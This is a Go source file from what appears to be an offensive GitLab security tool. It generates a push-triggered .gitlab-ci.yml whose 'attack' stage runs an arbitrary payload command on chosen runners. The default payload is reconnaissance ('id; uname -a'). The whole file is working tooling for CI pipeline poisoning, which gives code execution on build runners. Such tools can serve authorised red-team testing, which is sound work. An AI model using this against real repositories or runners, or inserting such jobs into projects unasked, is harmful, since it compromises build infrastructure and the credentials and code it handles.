package attack

import (
	"fmt"
	"strings"

	"github.com/mr-pmillz/gogatoz/pkg/stringutil"
)

// PushCI provides helpers to generate a push-triggered GitLab CI configuration
// that runs an arbitrary payload on a specific branch.
type PushCI struct{ *Attacker }

func NewPushCI(att *Attacker) *PushCI { return &PushCI{Attacker: att} }

// GeneratePushCI returns a .gitlab-ci.yml content that triggers only on push to the
// given branchName and executes the provided payload command. If runnerTags are
// provided, the job will target those tags.
func (p *PushCI) GeneratePushCI(branchName, jobName, payload string, runnerTags []string) string {
	if strings.TrimSpace(branchName) == "" {
		branchName = GogatozAttacks
	}
	if strings.TrimSpace(jobName) == "" {
		jobName = "branch-push"
	}
	if strings.TrimSpace(payload) == "" {
		payload = "echo GoGatoZ push CI executed; id; uname -a"
	}

	var tagLine string
	if len(runnerTags) > 0 {
		tagLine = fmt.Sprintf("\n  tags: [%s]", stringutil.QuoteJoin(runnerTags))
	}

	// Use a block scalar to preserve multi-line payloads safely.
	payloadBlock := indentBlock(payload, 4)

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ
stages: [attack]

%s:
  stage: attack%s
  script:
    - |
%s
  rules:
    - if: "$CI_PIPELINE_SOURCE == 'push' && $CI_COMMIT_BRANCH == '%s'"
`, jobName, tagLine, payloadBlock, branchName)
}

// indentBlock indents each line by n spaces for YAML block scalars.
func indentBlock(s string, n int) string {
	pad := strings.Repeat(" ", n)
	lines := strings.Split(s, "\n")
	for i := range lines {
		lines[i] = pad + lines[i]
	}
	return strings.Join(lines, "\n")
}
